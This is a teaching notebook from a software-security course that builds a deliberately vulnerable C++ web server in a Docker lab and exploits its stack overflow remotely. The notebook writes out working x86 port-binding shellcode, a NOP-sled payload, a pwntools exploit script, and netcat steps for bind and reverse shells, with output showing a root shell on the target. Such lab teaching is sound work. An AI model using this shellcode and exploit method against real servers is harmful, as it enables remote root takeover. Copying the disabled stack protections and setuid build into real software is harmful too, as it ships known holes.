# A Tiny Web Server & Its Exploitation

- Web Server concept and some code based on the book `Hacking - The Art of Exploitation 2nd Edition by Jon Erickson`
- similar to simple server but uses HTTP protocol to communicate; hence called Web Server
- handles HTTP GET and HEAD requests
- looks for the requested resource in the local directory callled `webroot` and sends it to the client/browser
- if the file/resource is not found, the server responds with 404 HTTP (`File Not Found`) error in response
- a tiny web server that serves static html webpage
- see `demos/server/tinyweb`

In [2]:
# check the working directory
%pwd

'/home/kali/projects/SoftwareSecurity/notebooks'

In [3]:
%cd ../demos/server/tinyweb

/home/kali/projects/SoftwareSecurity/demos/server/tinyweb


In [4]:
# list files and folders from current working directory
! ls

docker-compose.yaml  main.cpp	  port_bind_exploit.bin    webroot
Dockerfile	     main.o	  port_bind_shellcode.bin
exploit.py	     Makefile	  tinyweb.exe
junk.txt	     pattern.txt  util


In [5]:
! cat main.cpp

#include <stdio.h>
#include <fcntl.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include "./util/utility.h"
#include "./util/net_utility.h"

enum REQUEST_TYPE {GET, POST, HEAD, UNKNOWN};

using namespace std;

#define PORT 80   // the port users will be connecting to
#define WEBROOT "./webroot" // the web server's root directory

void handle_connection(int, struct sockaddr_in *); // handle web requests
int get_file_size(int); // returns the filesize of open file descriptor
void send_file_not_found(const int); // send file not found error
void send_file(const int, char *, unsigned int); // send file/resource requested
void send_buffer_address(const int, char *); // send buffer address

int main(void) {
   int sockfd, new_sockfd, yes=1; 
   struct sockaddr_in host_addr, client_addr;   // my address information
   socklen_t sin_size;

   printf("Accepting web requests on port %d\

In [6]:
! cat util/net_utility.h

#include <cstring>
#include <string>

using namespace std;

/* This function accepts a socket FD and a ptr to the null terminated
 * string to send.  The function will make sure all the bytes of the
 * string are sent.  Returns 1 on success and 0 on failure.
 */
int send_string(int sockfd, string buffer) {
   int sent_bytes, bytes_to_send;
   bytes_to_send = buffer.length();
   while(bytes_to_send > 0) {
      sent_bytes = send(sockfd, buffer.c_str(), bytes_to_send, 0);
      if(sent_bytes == -1)
         return 0; // return 0 on send error
      bytes_to_send -= sent_bytes;
      buffer += sent_bytes;
   }
   return 1; // return 1 on success
}

/* This function accepts a socket FD and a ptr to a destination
 * buffer.  It will receive from the socket until the EOL byte
 * sequence in seen.  The EOL bytes are read from the socket, but
 * the destination buffer is terminated before these bytes.
 * Returns the size of the read line (without EOL bytes).
 */
int recv_line(int sockfd, char 

In [7]:
! cat webroot/index.html

<html>
	<head><title>A sample webpage</title>
	</head>
	<body bgcolor="#000000" text="#ffffffff">
		<center>
			<h1>Home<h1>

			<h3>This is a sample webpage....</h3>

			<p>...and this is a paragraph</p>

			<p>
				A simple link to <a href="http://example.com" target="__blank">Example.com</a>
			</p>

			<p>...and even a sample image:</p>
			<img src="image.jpg"><br>
		</center>
	</body>
</html>


In [8]:
! cat ./util/net_utility.h

#include <cstring>
#include <string>

using namespace std;

/* This function accepts a socket FD and a ptr to the null terminated
 * string to send.  The function will make sure all the bytes of the
 * string are sent.  Returns 1 on success and 0 on failure.
 */
int send_string(int sockfd, string buffer) {
   int sent_bytes, bytes_to_send;
   bytes_to_send = buffer.length();
   while(bytes_to_send > 0) {
      sent_bytes = send(sockfd, buffer.c_str(), bytes_to_send, 0);
      if(sent_bytes == -1)
         return 0; // return 0 on send error
      bytes_to_send -= sent_bytes;
      buffer += sent_bytes;
   }
   return 1; // return 1 on success
}

/* This function accepts a socket FD and a ptr to a destination
 * buffer.  It will receive from the socket until the EOL byte
 * sequence in seen.  The EOL bytes are read from the socket, but
 * the destination buffer is terminated before these bytes.
 * Returns the size of the read line (without EOL bytes).
 */
int recv_line(int sockfd, char 

In [9]:
! cat Makefile

# rule for compiling program

COMPILER = g++
COMPILER_FLAGS = -c -g -Wall -std=c++17 -m32
BUILD_FLAGS = -m32 -fno-stack-protector -z execstack -no-pie

# list .cpp files separated by space
CPP_FILES = main.cpp

# executable program name
PROGRAM_NAME = tinyweb.exe

.PHONY: all
all: build run

# rule for compiling and building program
# make or make all triggers the following rule
.PHONY: build
build:
	# compiles .cpp to object file .o
	$(COMPILER) $(COMPILER_FLAGS) $(CPP_FILES)
	# builds executable from object files
	$(COMPILER) $(BUILD_FLAGS) -o $(PROGRAM_NAME) *.o
	chown root:root $(PROGRAM_NAME)
	chmod u+s $(PROGRAM_NAME)


# rule for running programming
# make run triggers the following rule
.PHONY: run
run:
	./$(PROGRAM_NAME)

# rule for clean up
# make clean triggers the following rule
.PHONY: clean
clean:
	rm -f $(PROGRAM_NAME) *.o
	


In [10]:
! cat ./util/utility.h

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <string>

using namespace std;

// A function to display an error message and then exit
void fatal(string message) {
   char error_message[100];

   strcpy(error_message, "[!!] Fatal Error ");
   strncat(error_message, message.c_str(), 83);
   perror(error_message);
   exit(-1);
}

// An error checked malloc() wrapper function
void *ec_malloc(unsigned int size) {
   void *ptr;
   ptr = malloc(size);
   if(ptr == NULL)
      fatal("in ec_malloc() on memory allocation");
   return ptr;
}

// dumps raw memory in hex byte and printable split format
void dump(char *data_buffer, const unsigned int length) {
	unsigned char byte;
	unsigned int i, j;
	for(i=0; i < length; i++) {
		byte = data_buffer[i];
		printf("%02x ", data_buffer[i]);  // display byte in hex
		if(((i%16)==15) || (i==length-1)) {
			for(j=0; j < 15-(i%16); j++)
				printf("   ");
			printf("| ");
			for(j=(i-(i%16)); j <= i; j++) {  // display printable bytes

### Build and run Tinyweb Server in a Docker image

- NOTE - don't build the tinyweb server in the Docker; disabling -fno-stack-protector is not working!
- use provided `docker-compose` file that uses `Dockerfile` to build and run the image
- compile tiny web server and run it using Makefile from Docker Terminal
- access the IP address using the host browser
- observe the log on the server

```bash
┌──(kali㉿kali)-[~/…/SoftwareSecurity/demos/server/tinyweb]
└─$ docker-compose --build up

┌──(kali㉿kali)-[~/…/SoftwareSecurity/demos/server/tinyweb]
└─$ docker container ls 

CONTAINER ID   IMAGE            COMMAND                  CREATED             STATUS             PORTS                               NAMES
cc1590ca3f63   tinyweb_server   "sh -c 'echo 0 > /pr…"   About an hour ago   Up About an hour   0.0.0.0:80->80/tcp, :::80->80/tcp   tinyweb

┌──(kali㉿kali)-[~/…/SoftwareSecurity/demos/server/tinyweb]
└─$ docker exec -it tinyweb bash
root@tinyweb:/var/www# ifconfig | grep inet
        inet 192.168.100.100  netmask 255.255.240.0  broadcast 192.168.31.255
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>

root@tinyweb:/var/www# make all
# compiles .cpp to object file .o
g++ -c -g -Wall -std=c++17 -m32 main.cpp
# builds executable from object files
g++ -m32 -fno-stack-protector -z execstack -no-pie -o tinyweb.exe *.o
chown root:root tinyweb.exe
chmod u+s tinyweb.exe
./tinyweb.exe
Accepting web requests on port 80
Got request from 192.168.16.1:44262 "GET / HTTP/1.1"
Received: 14 bytes
        Opening './webroot/index.html'   200 OK
Got request from 192.168.16.1:44270 "GET /image.jpg HTTP/1.1"
Received: 23 bytes
        Opening './webroot/image.jpg'    200 OK
Got request from 192.168.16.1:44286 "GET /image.jpg"
Received: 0 bytes
 NOT HTTP!
 
 
┌──(kali㉿kali)-[~/…/SoftwareSecurity/demos/server/tinyweb]
└─$ wget 192.168.100.100
--2025-04-06 00:15:09--  http://192.168.16.2/
Connecting to 192.168.100.100:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified
Saving to: ‘index.html.1’

index.html.1                     [ <=>                                        ]     401  --.-KB/s    in 0s      

2025-04-06 00:15:09 (42.6 MB/s) - ‘index.html.1’ saved [401]

```

### Server Stackoverflow Vulnerability & Exploitation

- same concept as the previous stackoverflow vulnerability & exploitation
- only difference is that the input data to buffer is coming from remote client via TCP/IP
- server has stack overflow vulnerability in `recv_line(...)` of `util/net_utility.h` file

#### Crash Tinyweb server

- use a different VM or a machine (attacker machine)
- generate a junk data of 1000 bytes and send it to the server
- Web server's including Tinyweb server users `\r\n` as a delimeter to end the request string

In [ ]:
! python -c 'print("A"*1000, end="\r\n")' > junk.txt

In [ ]:
! hexdump -C junk.txt

In [ ]:
# count the number of bytes
! wc -c junk.txt

### send junk
- replace tinyserver ip and port
- send the junk from different VM or system

#### attacker machine

```bash
$ cat junk.txt | nc -v [tinyseverip] [port]
```

#### tiny webserver target

```
root@tinyweb:/var/www# make run
./tinyweb.exe
Accepting web requests on port 80
Request buffer @ 0xffffd400
Got request from 192.168.144.1:50322 "GET /buffer HTTP/1.1"
Received: 20 bytes
 200 OK
ls
^HRequest buffer @ 0xffffd400
make: *** [Makefile:29: run] Segmentation fault (core dumped)

```

## Pawn the Docker running Tinyweb server

- find the overflow vulnerability
- find the return address and offset from `request` buffer
    - this will give us the length of the payload we need to build

### Using GDB on a running process

- download the opensource/binary and run it locally
- run the `tinyweb.exe` and get its process id to attach it to the gdb
- the second column is the process id

- run the `tinyweb.exe` as a background process
```bash
┌──(kali㉿kali)-[~/…/SoftwareSecurity/demos/server/tinyweb]
└─$ docker exec -it tinyweb bash
root@tinyweb:/var/www# ./tinyweb.exe &
[1] 16 <--- this is the process id
```

- also can use `ps` and `grep` commands to get the process id

```bash
root@tinyweb:/var/www# ps aux | grep tinyweb
root          16  0.0  0.1   6268  2432 pts/0    S    20:09   0:00 ./tinyweb.exe

```

- run gdb on the tinyweb.exe process id

```
$ sudo gdb -q --pid=[tinywebpid] --symbols=./tinyweb.exe
```

- use gdb to examine memory and addresses

```bash
root@tinyweb:/var/www# gdb -q --pid=16 --symbols=./tinyweb.exe
Reading symbols from ./tinyweb.exe...
Attaching to process 16
Load new symbol table from "/var/www/tinyweb.exe"? (y or n) y
Reading symbols from /var/www/tinyweb.exe...
Reading symbols from /lib32/libstdc++.so.6...
(No debugging symbols found in /lib32/libstdc++.so.6)
Reading symbols from /lib32/libgcc_s.so.1...
(No debugging symbols found in /lib32/libgcc_s.so.1)
Reading symbols from /lib32/libc.so.6...
(No debugging symbols found in /lib32/libc.so.6)
Reading symbols from /lib32/libm.so.6...
(No debugging symbols found in /lib32/libm.so.6)
Reading symbols from /lib/ld-linux.so.2...
(No debugging symbols found in /lib/ld-linux.so.2)
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
0xf7fc4579 in __kernel_vsyscall ()


(gdb) list main  # list 10 lines around main
21      int get_file_size(int); // returns the filesize of open file descriptor
22      void send_file_not_found(const int); // send file not found error
23      void send_file(const int, char *); // send file/resource requested
24      void send_buffer_address(const int, char *); // send buffer address
25
26      int main(void) {
27         int sockfd, new_sockfd, yes=1; 
28         struct sockaddr_in host_addr, client_addr;   // my address information
29         socklen_t sin_size;
30

(gdb) list 75 # list 10 lines around line 75
70
71              char address[100];
72              sprintf(address, "Request buffer @ %p\r\n", request);
73              printf("%s", address);
74              // receive one line from client and store it into request buffer
75              length = recv_line(sockfd, request);
76
77              printf("Got request from %s:%d \"%s\"\n", inet_ntoa(client_addr_ptr->sin_addr), ntohs(client_addr_ptr->sin_port), request);
78              printf("Received: %d bytes\n", length);
                                                                    

$ break 75 # break at recv_line function that has overrun issue

$ continue # make a get request using a terminal or browser to hit the breakpoint
(gdb) p &request
$1 = (char (*)[500]) 0xffffd460 # Note the address of request variable 

(gdb) p request
$7 = "GET /image.jpg\000HTTP/1.1\000\n\000@\332\377\367\000\000\000\000\000\320\377\367\000\000\000\000\000\320\377\367 \000\000\000\000\000\000\000\224\002\375\367\000\000\000\000\024\324\377\377\240\333\377\367\003\000\000\000\260\324\377\377\000\000\000\000\000\000\000\000\377\377\377\377@\332\377\367\377\377\377\377@\352\373\367Pf\374\367\b\326\377\367\000\000\000\000\000\320\377\367 \000\000\000\000\000\000\000\020\000\000\000\b\326\377\367\216F\375\367\000\260\377\367\000\000\000\000\373\203\264\367D@\325\367@\352\373\367 o\375\367\373\203\264\367@\352\373\367P\324\377\377\f\354\373\367`\372\373\367\001\000\000\000\001\000\000\000\000\000\000\000\t\000\000\000\256\022"...

(gdb) p $ebp+4
$2 = (void *) 0xffffd66c

(gdb) x/x $ebp+4
0xffffd66c:     0x08049a87

(gdb) bt # find the return address to main

# return address to main/caller is also stored at $ebp+4

(gdb) x/x $ebp+4
0xffffb97c:     0x08049a77

# OFFSET to return address
(gdb) p/d (char *)($ebp+4) - (char *)&request
$3 = 524

```

- exit the debugger and rerun the server from the same Terminal

### Remote Exploit

- local exploit is not practical in real-world, why?
- let's create a port binding shellcode so the attacker can remotely login to the victim once pwned
- use a different VM or system as an attacker machine
- create Port Binding Shellcode Exploit
- Generate Shellcode using GDB PEDA
- write the binary shellcode to a file
- add about 100 bytes to the beginning address of `request` buffer to get the working landing address

### Generate port binding shellcode

- make sure to provide IP of the target/victim system and available ports above 1024
- gdb-peda$ shellcode generate x86/linux bindport <port> <ip>
- find victim's IP address
- pick a port, e.g. 9999 # that's unlikely in use by the Tinyweb server
- find the IP of tinyweb server to generate the shellcode
- e.g., 192.168.144.2 is the IP of my Docker running the tinweb server
    
```bash
┌──(kali㉿kali)-[~/projects/SoftwareSecurity/demos/server/tinyweb]
└─$ ifconfig        
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.47.130  netmask 255.255.255.0  broadcast 192.168.47.255
        inet6 fe80::ed5d:b4c2:d275:17ca  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:8a:20:62  txqueuelen 1000  (Ethernet)
        RX packets 47707  bytes 68315780 (65.1 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 4863  bytes 456804 (446.0 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0


┌──(kali㉿K)-[~]
└─$ gdb -q           
gdb-peda$ shellcode generate
Available shellcodes:                                                                          
    x86/linux exec                                                                           
    x86/linux bindport                                                                       
    x86/linux connect                                                                       
    x86/bsd exec                                                                             
    x86/bsd bindport
    x86/bsd connect

gdb-peda$ shellcode generate x86/linux bindport 9999 192.168.100.100
# x86/linux/bindport: 84 bytes
# port=9999, host=192.168.100.100
shellcode = (
    "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96"
    "\x43\x52\x66\x68\x27\x0f\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56"
    "\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1"
    "\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0"
    "\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
    "\x89\xe1\xcd\x80"
)

gdb-peda$ quit
```

In [4]:
! pwd

/home/kali/projects/SoftwareSecurity/demos/server/tinyweb


In [68]:
# FIXME: update your binary shellcode from PEDA...
# x86/linux/bindport: 84 bytes
# port=9999, host=192.168.100.100
shellcode = (
    "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96"
    "\x43\x52\x66\x68\x27\x0f\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56"
    "\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1"
    "\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0"
    "\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
    "\x89\xe1\xcd\x80"
).encode('latin-1')


#FIXME: provide abs or relative path/file_name of the binary file to create
fileName = "port_bind_shellcode.bin"

# open and write binary to the file

with open(fileName, 'wb') as fout:
	fout.write(shellcode)

print(f'All done! Binary file created: {fileName}') 

All done! Binary file created: port_bind_shellcode.bin


In [69]:
! hexdump -C port_bind_shellcode.bin

00000000  31 db 53 43 53 6a 02 6a  66 58 99 89 e1 cd 80 96  |1.SCSj.jfX......|
00000010  43 52 66 68 27 0f 66 53  89 e1 6a 66 58 50 51 56  |CRfh'.fS..jfXPQV|
00000020  89 e1 cd 80 b0 66 d1 e3  cd 80 52 52 56 43 89 e1  |.....f....RRVC..|
00000030  b0 66 cd 80 93 6a 02 59  b0 3f cd 80 49 79 f9 b0  |.f...j.Y.?..Iy..|
00000040  0b 52 68 2f 2f 73 68 68  2f 62 69 6e 89 e3 52 53  |.Rh//shh/bin..RS|
00000050  89 e1 cd 80                                       |....|
00000054


### Use Python script to create binary shellcode file

- alternatively, a Python script `shellcode_writer.py`is provided in shellcode folder to simplify generating binary shellcode file 
- can simply copy paste shellcode generated by PEDA and update the filename
- the program when run will generate the binary file with shellcode

In [70]:
! wc -c port_bind_shellcode.bin

84 port_bind_shellcode.bin


In [71]:
# lets create the exploit code to send to the server
# find the size of the NOP sled; repeat the buffer address 50 times
# add at least 4 bytes to offset to overwrite the return address
778-84-(50*4)

494

In [72]:
! python3 -c 'import sys; sys.stdout.buffer.write(b"\x90"*494)' > port_bind_exploit.bin

In [73]:
# let's append the shellcode
! cat port_bind_shellcode.bin >> port_bind_exploit.bin

In [74]:
# difference in buffer address in gdb and not in gdb
# no difference because gdb anaylized live process ran from Terminal
! python -c 'print(0xffffd366 - 0xffffd366)'

0


In [75]:
# can't have 00 in the address
! python -c 'print(hex(0xffffd366+150))'

0xffffd3fc


In [76]:
# let's write the repeated return address: 0xffffd560
! python3 -c 'import sys; sys.stdout.buffer.write(b"\xfc\xd3\xff\xff"*50)' >> port_bind_exploit.bin

In [77]:
! wc -c port_bind_exploit.bin

778 port_bind_exploit.bin


In [78]:
# let's append the end of request delimeter \r\n
! python3 -c 'import sys; sys.stdout.buffer.write(b"\r\n")' >> port_bind_exploit.bin

In [79]:
! wc -c port_bind_exploit.bin

780 port_bind_exploit.bin


In [80]:
! hexdump -C port_bind_exploit.bin

00000000  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
*
000001e0  90 90 90 90 90 90 90 90  90 90 90 90 90 90 31 db  |..............1.|
000001f0  53 43 53 6a 02 6a 66 58  99 89 e1 cd 80 96 43 52  |SCSj.jfX......CR|
00000200  66 68 27 0f 66 53 89 e1  6a 66 58 50 51 56 89 e1  |fh'.fS..jfXPQV..|
00000210  cd 80 b0 66 d1 e3 cd 80  52 52 56 43 89 e1 b0 66  |...f....RRVC...f|
00000220  cd 80 93 6a 02 59 b0 3f  cd 80 49 79 f9 b0 0b 52  |...j.Y.?..Iy...R|
00000230  68 2f 2f 73 68 68 2f 62  69 6e 89 e3 52 53 89 e1  |h//shh/bin..RS..|
00000240  cd 80 fc d3 ff ff fc d3  ff ff fc d3 ff ff fc d3  |................|
00000250  ff ff fc d3 ff ff fc d3  ff ff fc d3 ff ff fc d3  |................|
*
00000300  ff ff fc d3 ff ff fc d3  ff ff 0d 0a              |............|
0000030c


### Exploit the Tinyweb Server

- rerun the Tinyweb server on the target machine
- send `port_bind_exploit.bin` from a different VM to the target machine
    - this mimics the real-world server exploitation 
- connect to the victim port 9999 using netcat
- read the flag stored in secret.txt file


```bash
┌──(kali㉿K)-[~/projects/NetworkSecurity]
└─$ cat port_bind_exploit.bin | nc -v 192.168.100.100 80 
```

- Tinyweb when exploited will run the port binding shellcode at port 9999 as shown below

```bash
root@tinyweb:/var/www# make run
./tinyweb.exe
Accepting web requests on port 80
Request buffer @ 0xffffd400
Got request from 192.168.144.1:33034 "GET /buffer HTTP/1.1"
Received: 20 bytes
 200 OK
Request buffer @ 0xffffd400
Got request from 192.168.144.1:55104 "����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������1�SCSjjfX����CRfh'fS��jfXPQV���f��RRVC���f�jY�?Iy��
                                                                           Rh//shh/bin��RS��x���x���x���x���x���x���x���x���x���x���x���x���x���x���x���x���x���x���x���x���x���x���x���x���x���x���x���x���x���x���x���x���x���x���x���x���x���x���x���x���x���x���x���"
Received: 528 bytes
 NOT HTTP!
```

- use another terminal from the attcker machine to netcat to port 9999
- once connected, you'll not see the prompt `$` `or `#`, but you can still issue commands on the pwned target

```bash
(base) ┌──(kali㉿kali)-[~/…/SoftwareSecurity/demos/server/tinyweb]
└─$ nc 192.168.100.100 9999
whoami
root
date
Fri Apr 18 01:16:49 UTC 2025
ls   
Dockerfile
Makefile
docker-compose.yaml
exploit.py
junk.txt
local_exploit.bin
main.cpp
main.o
pattern.txt
peda-session-tinyweb.exe.txt
port_bind_exploit.bin
port_bind_shellcode.bin
port_bind_shellcode.bin1
tinyweb.exe
util
webroot
cat /secret.txt 
flag{!Softwaresecurity is fun!}
```

## Exploit using Pwntools

- Pwntools library helps us automate most of the steps using a Python script
- let's use pwntools to exploit the remote tinyweb server
- running pwntools interactively from Jupyter Notebook doesn't seem to work; connection autoshuts down
- open `demos/tinyweb/exploit.py` file
- fix all the FIXMEs and run it to exploit the target

In [81]:
# it may fail from conda environment!!!!!
from pwn import *

In [83]:
# create a socket connection to target
io = connect('192.168.100.100', 80)

[x] Opening connection to 192.168.100.100 on port 80
[x] Opening connection to 192.168.100.100 on port 80: Trying 192.168.100.100
[+] Opening connection to 192.168.100.100 on port 80: Done


In [84]:
# send some data..
io.send(b'hello \r\n')

In [86]:
# tinyweb exploit code in Python
! cat exploit.py

#!/usr/bin/env python3

from pwn import *

# FIXME
target = '192.168.100.100'

# FIXME
service_port = 80

# FIXME - bind PORT to connect to when the shellcode is executed
bind_port = 9999

# FIXME
# x86/linux/bindport: 84 bytes
# port=9999, host=192.168.100.100
shellcode = (
    "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96"
    "\x43\x52\x66\x68\x27\x0f\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56"
    "\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1"
    "\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0"
    "\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
    "\x89\xe1\xcd\x80"
).encode('latin-1')

# size of nop sled = total buffer - shellcode size - repeated return address
# FIXME
nop_address = p32(0xffffd366) # pack little endian

# FIXME
offset_to_ret_add = 774

# FIXME
repeat_address = 50

repeated_return_address = nop_address*repeat_address

total_exploit_len = offset_to_ret_add + 4 # offset + 4 bytes to overwrit

- run the exploit code from its directory

```bash                                                                                      ┌──(kali㉿kali)-[~/…/SoftwareSecurity/demos/server/tinyweb]
└─$ python exploit.py
sled_len=494
sending exploit with len 780
[+] Opening connection to 192.168.100.100 on port 80: Done
Waiting 5 seconds to execute the shellcode and open 9999
Target 192.168.100.100 exploited... connecting to port: 9999
[+] Opening connection to 192.168.100.100 on port 9999: Done
[*] Switching to interactive mode
$ whoami
root
$ date
Fri Apr 18 01:47:02 UTC 2025
$ cat /secret.txt
flag{!Softwaresecurity is fun!}
$ exit
[*] Got EOF while reading in interactive
$ 
$ 
[*] Closed connection to 192.168.100.100 port 9999
[*] Got EOF while sending in interactive
[*] Closed connection to 192.168.100.100 port 80
```

## Remote Exploit - Connect-back Shellcode

- connecting to the victim machine is not easy due to firewall and IDS, IPS, etc.
- however, outgoing connection from target is typically allowed
- use the following exploit
- use a different VM or system as an attacker machine
- create connect back (TCP Reverse connect) shellcode
- generate Shellcode using GDB PEDA
    - IP address must be the address of the attacker machine that victim connect back to
    - Port can be any available port on the attacker machine for victim to connect back to
        - certain target port may be blocked by firewall and security Policy
- add about 100 bytes to the beginning address of request to get the working landing address


```bash
$ gdb -q
gdb-peda$ shellcode generate x86/linux connect <attacker_port> <attacker_ip>

```

- write shellcode to a file as binary one line at a time
- do one line at a time as following or use shellcode_writer.py script in shellcode folder

```bash
$ python3 -c 'import sys; sys.stdout.buffer.write(b"shellcode line1")' > reverse_tcp.bin
$ python3 -c 'import sys; sys.stdout.buffer.write(b"shellcode line2")' >> reverse_tcp.bin
...
...
```

- calculate `n` and `m` to make exploit code
    - `[<NOP sled>*n + len(reverse_tcp.bin) + <return address>*m]`
- repeated return address = `<address of request> + 100`
- run a server on attacker machine so the victim can connect back to it
- port must be the same as used in the exploit code

```bash
$ nc -v -l -p <attacker_port>
```

- create the exploit code (connect_back_exploit_code.bin) as demonstrated in local exploit
- send the expploit code to the Tinyweb server using netcat

```bash
$ cat connect_back_exploit_code.bin | nc -v <target ip> 80
```
- check the terminal running the netcat server on the attacker machine to verify if the victim is exploited and connected back to the attacker 
- interact with the victim